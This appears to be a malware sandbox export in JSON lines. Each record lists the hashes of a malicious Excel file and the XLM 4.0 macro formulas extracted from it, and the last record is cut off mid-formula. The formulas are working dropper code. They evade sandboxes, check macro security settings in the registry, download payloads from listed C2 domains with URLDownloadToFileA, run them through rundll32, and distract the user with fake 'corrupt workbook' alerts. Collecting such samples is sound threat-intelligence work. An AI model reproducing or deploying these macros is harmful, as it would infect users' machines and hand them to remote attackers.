{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb3dcd523b35567753671e5986a96680517507ffd9a9f0fd658661c6ed88cffe"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb3dcd523b35567753671e5986a96680517507ffd9a9f0fd658661c6ed88cffe","filesize":167936,"md5":"28f3b91111e4e401f8d8dcfc12ca4e80","sha1":"2852c3f624c145f38b037bd1531875d366579002","sha256":"bb3dcd523b35567753671e5986a96680517507ffd9a9f0fd658661c6ed88cffe","sha512":"72c65f0c6349341dc39fa534ec49e331c8fcda8cf91b9e6a33eef8669c8336ca5f6640586d14d7e634cab40c1422e0236330b6bfb13f6474e6b09a2f08e7e95b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb3dcd523b35567753671e5986a96680517507ffd9a9f0fd658661c6ed88cffe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fECBQlH2dW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb4635a9e4134b8cc51c42892715009275ba98d2c6ea23f7f17c6fd16484d89d"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb4635a9e4134b8cc51c42892715009275ba98d2c6ea23f7f17c6fd16484d89d","filesize":185344,"md5":"2bffe23885c453f8631154e3c3cab503","sha1":"0e0b8d1f978eae5c4bd68f0d0561a9aba38d84c5","sha256":"bb4635a9e4134b8cc51c42892715009275ba98d2c6ea23f7f17c6fd16484d89d","sha512":"d27c30f17b6034c9bc5b5a223839d72d95a65cf7619f1ae16d6f95a200b522d5a1989801aed84262e60c1afd13c1b1f31aa645fc9fb4c13f8fd8b01e522bd20c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb4635a9e4134b8cc51c42892715009275ba98d2c6ea23f7f17c6fd16484d89d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb64adac7a6b3dce03b0aa337736d922face257998e12f3a5604cb847a3a788c"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb64adac7a6b3dce03b0aa337736d922face257998e12f3a5604cb847a3a788c","filesize":177152,"md5":"f5f94b308e3853c5d63873616bf16cc8","sha1":"d8747a3d8ebbbc3682f5f133af120da45744755e","sha256":"bb64adac7a6b3dce03b0aa337736d922face257998e12f3a5604cb847a3a788c","sha512":"0ac50bcb765e65311a78106f748f9efb1a915a443a2339893bf9b5c293ad0439bad391ff1083c23a1e9ef8ffc83bcea4c5321c97aac6fb603c2897acbb31f7f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb64adac7a6b3dce03b0aa337736d922face257998e12f3a5604cb847a3a788c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CvlSuNAEml\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb6c352ad7bcfe9e38df7decc0b30061702b2678288c644d28c3d45fc533a752"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb6c352ad7bcfe9e38df7decc0b30061702b2678288c644d28c3d45fc533a752","filesize":185344,"md5":"feb161e4953af01d610de419b1d852ec","sha1":"9ec0868cc9794832d01045abce3d738b7fc05a1f","sha256":"bb6c352ad7bcfe9e38df7decc0b30061702b2678288c644d28c3d45fc533a752","sha512":"32bbbe81f9403da9799c7703d8ca474ac3a8ee92ee67f8ec81bf4b4f64d2a0630873a6c04b96321c505afa619c7bad9b829a3fb7c7e580e2d9caa3a080c1abdf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb6c352ad7bcfe9e38df7decc0b30061702b2678288c644d28c3d45fc533a752.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb7c097cb29b3643f884438fd0ae845233a94c160982ce7ce38a22c80fc9ee22"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb7c097cb29b3643f884438fd0ae845233a94c160982ce7ce38a22c80fc9ee22","filesize":167936,"md5":"ad9d0893cc5adf6018debae6e1f886d7","sha1":"50e1631d2c98f12b8317359267f894fbaafa1ed2","sha256":"bb7c097cb29b3643f884438fd0ae845233a94c160982ce7ce38a22c80fc9ee22","sha512":"6387d0980fdab1f000d1ae6a146470c941330a9622109d11e6dfdeae3a13b3c4f0001f0aea4612840609d63915a3d96fe9a9df9931187d7cc47f47a21064d90a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb7c097cb29b3643f884438fd0ae845233a94c160982ce7ce38a22c80fc9ee22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5FAAMx8cWs\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb7c97f6ffcb7c071d77204f9e89d86110d74edbb913522aa3a668b105d658a0"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb7c97f6ffcb7c071d77204f9e89d86110d74edbb913522aa3a668b105d658a0","filesize":177152,"md5":"7d8a1970dfdfcc60c7a32d7e06559dba","sha1":"f03f42e17476c2136c67d2754562c6e8034c1e1d","sha256":"bb7c97f6ffcb7c071d77204f9e89d86110d74edbb913522aa3a668b105d658a0","sha512":"0bb30434c2711f7aa9e43985b2cc37f8864382b1f9ed1386e240e008c21f2471fb29ad7d40819cb2bc06fead6998bac4240a2dc3099a90b5027e87fbb84e0293","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb7c97f6ffcb7c071d77204f9e89d86110d74edbb913522aa3a668b105d658a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1UjIZX2q0A\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb80472d9f9e4a06c1ac66b19955ccf503b0614d5649aaf239543ba900edcff1"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb80472d9f9e4a06c1ac66b19955ccf503b0614d5649aaf239543ba900edcff1","filesize":185344,"md5":"0d0f6d8de4cc6498b0b1a3447799863c","sha1":"23ba14806102346ec5853170098c59de733e7533","sha256":"bb80472d9f9e4a06c1ac66b19955ccf503b0614d5649aaf239543ba900edcff1","sha512":"3ec9b8ace105f8219195a5cdf4c644adaca3c31d539dc445ebb6a35b5d84df425e82fbe62e699ea3b00b48d33422995694f0e3b25b0e9862cf2a9b0c63c388e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb80472d9f9e4a06c1ac66b19955ccf503b0614d5649aaf239543ba900edcff1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb8774fb6d2af280093f6a95026da176a304e562ff27d2dd5aef472b8c445ba6"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb8774fb6d2af280093f6a95026da176a304e562ff27d2dd5aef472b8c445ba6","filesize":206336,"md5":"50a093a416bb2617443d3d26a847b8ea","sha1":"2cd0987d94eef9adc2ce8a344060fc44468807e3","sha256":"bb8774fb6d2af280093f6a95026da176a304e562ff27d2dd5aef472b8c445ba6","sha512":"462cee5be38c068a27562401f577eff60aac68051ea7f3768854fe551088b718bddb61b3adcaf91a694b7d9d9920373e476e6eadc00ef8e7653284c3f1ed912d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb8774fb6d2af280093f6a95026da176a304e562ff27d2dd5aef472b8c445ba6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bZu0182K9W\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb8ffa3017d910ddd84870cae8d35fe3aa2cbe3c17045ffbf79552b2e5836b6a"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb8ffa3017d910ddd84870cae8d35fe3aa2cbe3c17045ffbf79552b2e5836b6a","filesize":116224,"md5":"cf462fc0170656a98cf929435ddec09d","sha1":"da8fb8b2113f64e06386ce73d2f9c9e034d3724c","sha256":"bb8ffa3017d910ddd84870cae8d35fe3aa2cbe3c17045ffbf79552b2e5836b6a","sha512":"d899980033ad0d07636f257f4595900ee1c33d4f3fe632fa157bf67e2ab90cb2fd5927e0ba3be22eb44af5d0113a1d6959a68c5ecd06811792eb2e438523e0ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb8ffa3017d910ddd84870cae8d35fe3aa2cbe3c17045ffbf79552b2e5836b6a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eUm29BSZLV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bba0bbf65fd987c3f465b6546c03181d6d425b542f241b94e6afb4b6e0514350"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bba0bbf65fd987c3f465b6546c03181d6d425b542f241b94e6afb4b6e0514350","filesize":168960,"md5":"9a8027343b5f24332696a46724747cac","sha1":"9f4ee62f9ea8f78fd7abf2d875abe49396a723c0","sha256":"bba0bbf65fd987c3f465b6546c03181d6d425b542f241b94e6afb4b6e0514350","sha512":"484fc46b84897be3ffa28b51b77e269bbe7eb6d55e51647aff8422f5c0845878de980dfb67a083d200aacd9abcf370135066075c6d1187a8f962ce9cc7b2060b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bba0bbf65fd987c3f465b6546c03181d6d425b542f241b94e6afb4b6e0514350.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4EAobSVVXl\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bbb7fd4d6efae3ecc0dec6c41d5e653b0dbc61ff508979a26131048892a60644"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bbb7fd4d6efae3ecc0dec6c41d5e653b0dbc61ff508979a26131048892a60644","filesize":138240,"md5":"0a7bff8e2759a7c6dc2906de975737dd","sha1":"91fcb12a3807cc9c932045aada8ec02153da2ea9","sha256":"bbb7fd4d6efae3ecc0dec6c41d5e653b0dbc61ff508979a26131048892a60644","sha512":"25bdcf2305ce5b34e3f832f9f4f55372d4739b53c491a3441f4a5ec8dd4884b21c89b90f861dca880671c8667deeb3995394ff16700fcfaba808440dab06e2cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bbb7fd4d6efae3ecc0dec6c41d5e653b0dbc61ff508979a26131048892a60644.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://gengrasjeepram.com/sv.exe"],"attr":{"formulas":"CALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://gengrasjeepram.com/sv.exe\",\"gift.exe\",0,0)\nEXEC(\"gift.exe\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bbbc80b7767da73cd102f559c6bfd1fad060e34f4593d9288a51fe71dd58485a"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bbbc80b7767da73cd102f559c6bfd1fad060e34f4593d9288a51fe71dd58485a","filesize":221184,"md5":"bda893754ecafdd3eeb8e71b58edd47f","sha1":"8bcba6d1f1a50904e8d4223ce0f84f70aa97f72f","sha256":"bbbc80b7767da73cd102f559c6bfd1fad060e34f4593d9288a51fe71dd58485a","sha512":"d13fa5b2f498353ac118e3ed9c258051e114a7dcf5a6f9a83ebcbbd46ebbe5909dc7c6c0bb9092ba81a6b27d5ab2a60d5a83005718782b216584fc3b7a38c678","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bbbc80b7767da73cd102f559c6bfd1fad060e34f4593d9288a51fe71dd58485a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hwrF1TGo1Z\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bbe57774070e7ec2682c7477d5ecff40322d5ed31f716839638749b1475cae30"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bbe57774070e7ec2682c7477d5ecff40322d5ed31f716839638749b1475cae30","filesize":185344,"md5":"35cdfe041556d32c7e3cdd1352e4a344","sha1":"e00c880237912ebf219f24870484518aaefe49b1","sha256":"bbe57774070e7ec2682c7477d5ecff40322d5ed31f716839638749b1475cae30","sha512":"72355dda3adb902e639b758f793fe68235faf2f8e45bf4b65015afdea7cf74cadb8c675e4eb87dcded8c45f1b720d0548c5ecfd4fcd5b6e024335ef43bb3ebac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bbe57774070e7ec2682c7477d5ecff40322d5ed31f716839638749b1475cae30.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bbf4c6beef17aa9380fcf2220688c499a28de8cf0f8eebf93c289af10325cbbc"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bbf4c6beef17aa9380fcf2220688c499a28de8cf0f8eebf93c289af10325cbbc","filesize":206336,"md5":"b3e8d398b4f2a41fe716705d02d28113","sha1":"0b8914e2879f310ecfcc0360d9b99bc7c33c68d1","sha256":"bbf4c6beef17aa9380fcf2220688c499a28de8cf0f8eebf93c289af10325cbbc","sha512":"554dc3a8556d138e9915a34ff24ee88a3759c77c2ae99c9e3ca073f1846d8f555c99e84fccdd0b1068b3dd8014132e0acc74dd8130da7f5596f76f4ef36c523a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bbf4c6beef17aa9380fcf2220688c499a28de8cf0f8eebf93c289af10325cbbc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"A0giymQt4y\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bbfa29ad1a7e6f671f1233aaa9b8e99ceaefe738bb134cfb8d174ff70203ed07"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bbfa29ad1a7e6f671f1233aaa9b8e99ceaefe738bb134cfb8d174ff70203ed07","filesize":144384,"md5":"ab569e135d5c4f40775c09db02583f0d","sha1":"71ebe4a2bd9200902aedbb483e9aead23dc6216f","sha256":"bbfa29ad1a7e6f671f1233aaa9b8e99ceaefe738bb134cfb8d174ff70203ed07","sha512":"911bc2a67db32c60da6255e0b9c18c8221a708ebf861dfbbbb19442fe080084218b89bdacc300e599acde299ed13580be7fada7f437c187a407611aac575f172","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bbfa29ad1a7e6f671f1233aaa9b8e99ceaefe738bb134cfb8d174ff70203ed07.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"u8R7tFvBAJ\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bbffd73f34a4c876395645847b7f5541fcd9f0f4b3dd1c160f18901826f6fd7c"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bbffd73f34a4c876395645847b7f5541fcd9f0f4b3dd1c160f18901826f6fd7c","filesize":167936,"md5":"987e578d2c888f4a0f2792dac170e14e","sha1":"1f98313af1d85e53c8c7acd35638d06da469dc20","sha256":"bbffd73f34a4c876395645847b7f5541fcd9f0f4b3dd1c160f18901826f6fd7c","sha512":"a0e91a2e7f3b4d17302e97715ad148eea294e117f94fcae3d72e23cb3a4f6bf9d771d667f0190adb23592ad59a5b36b869074efc339263f4bd77fd1191122f2a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bbffd73f34a4c876395645847b7f5541fcd9f0f4b3dd1c160f18901826f6fd7c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MosBk9coMQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc24cdd9218ef6164b9432da445c3bbc364269eb75faebe7adbf40a5fa6b873a"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc24cdd9218ef6164b9432da445c3bbc364269eb75faebe7adbf40a5fa6b873a","filesize":206336,"md5":"f67c916c443649b641983554914a38c5","sha1":"e08c6d091c481d560c43c5576fae93b141cadc12","sha256":"bc24cdd9218ef6164b9432da445c3bbc364269eb75faebe7adbf40a5fa6b873a","sha512":"290c2278dbabb32da4b68ddf73853f1609d36aba34641439ac07c1355979391a2cbae80aa2effc8be1c1570bd3483d705f35e48bfc91dae617aebc29cc17a8d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc24cdd9218ef6164b9432da445c3bbc364269eb75faebe7adbf40a5fa6b873a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, 